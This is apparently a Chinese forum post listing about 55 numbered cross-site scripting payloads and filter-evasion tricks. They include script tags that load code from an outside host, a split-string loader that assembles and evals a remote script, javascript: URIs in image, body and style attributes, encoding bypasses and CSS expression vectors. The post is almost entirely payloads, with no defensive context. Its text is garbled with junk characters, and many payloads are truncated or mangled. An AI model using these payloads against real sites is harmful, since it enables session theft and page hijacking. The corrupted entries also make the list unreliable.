(1)普通的XSS JavaScript注入
, T' J M$ W# X' ]6 v6 d; j+ }<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 j3 E9 b# S5 {0 n(99)另类弹框
9 A8 j) b2 t; Z; M4 O W' @<q/oncut=alert()>1& Z$ L4 i9 n2 C& V
<s/onclick=alert()>b# q; Z6 L+ f' v0 L7 T2 O
<XSS=" onclick="alert(1)//">clickme</SSX=">
2 B W& f; `: S7 @ <zzz onclick=alert`1`>clickme</zzz>
2 n. |, x. }, E( R8 D7 ] <a onclick=alert`1`>clickme</a>- b. h3 b3 r) ~' F* ^% [8 o8 y9 |* B
<a=">clickme</a=">
) u* D# {$ Z4 s8 A<a=">clickme</a>2 x& K% v. b4 \( v. z6 V3 N
<z=">clickme</z=">
" D% i7 q; y# I5 h+ Q) o0 t8 T! u5 ~: m<z onclick=alert`1`>clickme</z>
# j$ k4 X) m0 H( k3 [, V- c* k
* r" r) c7 @0 r(2)IMG标签XSS使用JavaScript命令- [: |, x) p- W/ {1 p* l& ^
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 G, V; N" J; a a" s0 Y9 I m- }$ J& e
(3)IMG标签无分号无引号
v2 J2 P+ `- ~6 `$ \* _% S" p<IMG SRC=javascript:alert(‘XSS’)>
! Y2 [- b" {7 F$ q8 h
j6 |$ F- H1 w9 a- S(4)IMG标签大小写不敏感2 O# e( u, I- f6 V9 d* r
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" U( F \, F8 q! d* b% n
- Z6 A0 r, m" ?6 o(5)HTML编码(必须有分号)
4 R- l+ D5 E9 Q6 n) k<IMG SRC=javascript:alert(“XSS”)>
/ `$ I9 h& `4 c
- u; A' o, A. M) E" y Z8 o' b) }( k(6)修正缺陷IMG标签
. ^. p( j o! m! Y4 k/ x4 q& l3 r<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
6 X5 Z1 m4 f$ k+ M2 J& ?8 p$ e, {5 J& _& f
(7)formCharCode标签(计算器)
4 B# Y/ t) ^0 q, v<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 y/ b& \* {7 [' d* I0 {4 l3 v1 ]2 P& c, Q( r2 l1 E4 v. K- E
(8)UTF-8的Unicode编码(计算器)3 K- F& ?* G3 X
<IMG SRC=jav..省略..S')>
( P- ]* C, Q) B0 N
/ W+ h2 x( O+ E& X, p' p(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# A- o( j0 f! Y, U/ E- j; `$ \<IMG SRC=jav..省略..S')>9 l1 F2 u2 u4 |3 p
% Z% o0 t! U; {: [0 C(10)十六进制编码也是没有分号(计算器)
' _' @" F3 H8 n& z5 r3 a<IMG SRC=\'#\'" /span>. Y! A! P2 b+ S6 {2 v( M
4 ^" D1 s8 J- j
(11)嵌入式标签,将Javascript分开' l+ H. P- w/ O% Z# f
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>* B. m o& i4 H4 |& d9 k; \# V
y7 y9 ~1 J* j4 T+ Y
(12)嵌入式编码标签,将Javascript分开3 v! X- U$ D V. l# g- k
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
. t9 S& \. |# W$ D+ y
4 Q. K' ]- ?6 w5 ]' h+ c3 z(13)嵌入式换行符. i- h* w$ V) T3 ]
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>7 j: l! Q( o! A1 p, u0 T7 c
: @- P5 K7 S) E" k" x(14)嵌入式回车
" I! s3 y9 A' v% q$ c* q2 K<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
/ l2 Q2 x4 }; ]9 j6 r
- v" d; s! F% F# ~$ B: X8 S(15)嵌入式多行注入JavaScript,这是XSS极端的例子 _) m+ I3 E& P& e7 a7 z
<IMG SRC=\'#\'" /span>
$ Z9 J \2 I9 p/ ^
% I! B% a* p0 ]; G. n, q' Y(16)解决限制字符(要求同页面)+ k- J2 ]* Z D5 \& i3 o- h
<script>z=’document.’</script>
# @% ?0 O/ I* W; a9 Z/ U$ E<script>z=z+’write(“‘</script>
9 I7 o0 R. w/ _. i. g% H<script>z=z+’<script’</script>. y% ]3 t. h3 ?' Y4 V, Z. F
<script>z=z+’ src=ht’</script>3 @/ ?$ l `! o+ g' f% y
<script>z=z+’tp://ww’</script>; |* n/ l" Z( q, Y% ^2 n7 d) y) |
<script>z=z+’w.shell’</script>
( w5 W$ J" g' {! _2 q7 Y. N& E<script>z=z+’.net/1.’</script>; O4 i" g# W( k
<script>z=z+’js></sc’</script>
" M4 t; R0 o0 P' M! B _ d7 Y2 D<script>z=z+’ript>”)’</script>
9 q K6 F v8 E) O ^+ }6 C<script>eval_r(z)</script>
5 }6 l- b0 G; t2 _. \2 A8 M
! s* d3 q$ e) ?(17)空字符/ N- @. Z- l; z
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
. [5 ?! M& w0 o: ^5 Y0 X6 I! `; Y; V! `8 X! h1 [
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 F" [ i- m6 U, |4 \
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ u5 U7 {) w) [
) Z x8 V; J4 y
(19)Spaces和meta前的IMG标签
4 s* J/ M/ t, g<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>) r' v; q2 c' v) U
+ \# H: a( y% E2 F7 p(20)Non-alpha-non-digit XSS9 R% i* S9 ?) y' d
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>9 m6 s/ n4 d' A6 [0 Z9 z; s3 n
' L, N Y3 c' F! Z3 c) z
(21)Non-alpha-non-digit XSS to 2
. x3 b1 a" c% j' N4 \<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>& O! \) k2 q) }8 y
* ]- n: t1 t9 e; ]6 x
(22)Non-alpha-non-digit XSS to 3
; R3 Q% Q2 K/ [! v+ K: d0 n% B<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>8 P+ z; N" B# g4 _0 G2 L6 |- k
Y1 t0 Z F) L& I(23)双开括号; H: V8 m, v6 i) C
<<SCRIPT>alert(“XSS”);//<</SCRIPT>9 K/ g$ F! @; N& U) j! I
; g+ M( c" k+ A
(24)无结束脚本标记(仅火狐等浏览器)
* ]+ f/ ~7 K( h. s1 g% `6 I<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>8 C/ o+ L* s3 X$ [, v- q, i
N: R" c$ I9 Z( T3 N
(25)无结束脚本标记2
% ]' [/ ~8 v8 x6 H. b+ n% A<SCRIPT SRC=//3w.org/XSS/xss.js>; P( r8 B B4 r3 ]
6 G' w- H9 o5 r8 p5 d
(26)半开的HTML/JavaScript XSS2 z$ Z! U4 z9 S- e" k( @
<IMG SRC=\'#\'" /span>9 w1 Y* T0 h$ X* B: p
$ W# |8 u4 N( r K# I2 D(27)双开角括号
8 f# M1 z" X5 a% ?<iframe src=http://3w.org/XSS.html <
/ N# I9 h/ s1 F& ~0 E) `
7 Y9 d$ c9 m* k7 Q6 s- W- h; R4 t6 V5 r(28)无单引号 双引号 分号% e- ^7 o# q8 c2 u$ e
<SCRIPT>a=/XSS/
) I+ T; ]$ ?: galert(a.source)</SCRIPT>
+ j" P' C# l) [& g/ r# l0 G$ D' N5 t# v9 N
(29)换码过滤的JavaScript
3 Q7 M/ M+ K& J$ C3 O. y\”;alert(‘XSS’);//
6 X, g1 d( I4 n# S- u
* H# B: P' n; M1 [( t0 y& w: C(30)结束Title标签
( ]: o3 L: q1 d7 H6 x5 {- l</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! h8 f5 \7 R. q) N5 @0 K
- i- v) k! b. E+ |
(31)Input Image" n, N+ ^3 m b- r$ k
<INPUT SRC=\'#\'" /span>
" G& ~; \# T8 ?! e
2 S6 e: P% o" C(32)BODY Image
, v9 G9 s# m) c( u6 }" s<BODY BACKGROUND=”javascript:alert(‘XSS’)”>' {7 d% g5 t0 k, F( W" }' [% O7 _2 ]* B
/ \7 D, g& B- P% a `8 H(33)BODY标签- R. N& I4 ?3 n* ]/ q
<BODY(‘XSS’)>2 O' Z- u) ~5 h2 Z: Q; S
$ R+ [- S( j6 I# A. P+ |$ V5 a: r(34)IMG Dynsrc' M" M5 ~, I6 T5 X5 H* R( ], G( ~$ D6 u
<IMG DYNSRC=\'#\'" /span>
2 X; G6 F6 p8 I: j& y. m! w/ X) ], G. B. n9 g
(35)IMG Lowsrc
1 H% R, j2 U! D' i" K# B, l<IMG LOWSRC=\'#\'" /span># T6 p. F% ^" O
0 w4 U% F0 E3 |2 y
(36)BGSOUND$ s% M* f' p) M! ~( b# G. u
<BGSOUND SRC=\'#\'" /span>
# N& k1 w# ?1 M) w9 q- }9 ~! \1 O4 A1 E% N
(37)STYLE sheet; M, V* G! u+ u+ ~0 y
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>' b h/ v: d9 {8 D; M
* z' f7 [/ q- `7 D(38)远程样式表
+ n( T9 ]/ S6 H- v9 K! f0 ^<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>6 `+ ~1 V: l6 t, X1 I& n' t1 ^1 y
. s1 ?' G! N2 G
(39)List-style-image(列表式)
' N9 |& @* j2 y# h$ O% Q' P<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
1 D* s' p1 \9 L' x: ]) W' u3 J: T
9 o& s: A6 g+ |" ~! { F(40)IMG VBscript
8 f8 a, z, S- D2 Q<IMG SRC=\'#\'" /STYLE><UL><LI>XSS; l+ d& h0 o- R" r' a* B
2 j. H5 t: d0 A" k: F" R$ F(41)META链接url
1 D* h+ o5 w4 p5 D<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 D+ }, H1 Y0 Q" a2 {; [$ G
2 k$ H6 m: g! J& O
(42)Iframe& k% a" a/ G: ?6 r
<IFRAME SRC=\'#\'" /IFRAME>8 [* G' r: M' \7 `
" s+ r% L' i6 B$ v
(43)Frame4 C9 \0 G1 H8 t; f) K. g9 \# `
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
t! x& ^9 K; k- t
& L0 |/ x' @3 c* l( p(44)Table) M8 q& g `* O( q( i& H: G0 v
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 T$ s' h. d- M* F$ |
5 W# n X, d" e8 J8 R) ?5 x
(45)TD
6 \- @3 T$ D( H4 u6 @" @<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 x5 @# P( ^7 f7 Q
9 O1 R/ X D: j m(46)DIV background-image
) l! l3 s, W$ \<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 L- p, g$ m: n% D
1 W# c3 k, W, Q" ~ }
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)4 ~- |" f, k6 e. N" c
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
0 N- t. M2 Q0 C) z! u2 q( c3 v1 t
2 O% Q6 C" f1 w: O(48)DIV expression
2 ]& N5 Q# ^8 y1 e<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) {1 C" L! S* @, y+ I; K& Q
% _. P/ q9 S# m6 W: G(49)STYLE属性分拆表达. I7 @: N0 p! e8 k
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>) J' t) e4 |# `6 S, z- r' T
% `- E4 a* H8 K0 _3 w( P; w' C
(50)匿名STYLE(组成:开角号和一个字母开头)! o0 R- M# k9 Q: k X$ j n0 r
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>. |$ Q: F! O# E. [! G
% @- \# X9 f) Z! V6 h
(51)STYLE background-image
2 P' { y. h) o# j<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
. u1 `3 x8 U# S! m+ n# [. s" u8 `# S8 [3 H+ t8 i3 \
(52)IMG STYLE方式% D" T. C8 e$ i
exppression(alert(“XSS”))’>
H* ]. j6 g# T. a a
4 B% u+ x" t2 M1 M' M" b(53)STYLE background' p1 o H, S g. @
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! \$ O. M) [6 t1 Z* W6 A! P2 P* l- A% `3 ~: Q+ B o
(54)BASE0 d d/ Y- U L6 k/ W" B
<BASE HREF=”javascript:alert(‘XSS’);//”>
. g- W7 I- B2 L0 U W7 N$ r
6 {1 S# k* P/ `3 M$ u& K(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS$ s1 G: l9 y+ S/ I
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
% c7 L K4 k% p. G+ Y4 Q |
发表于 2016-4-28 10:06:15
收藏
支持
反对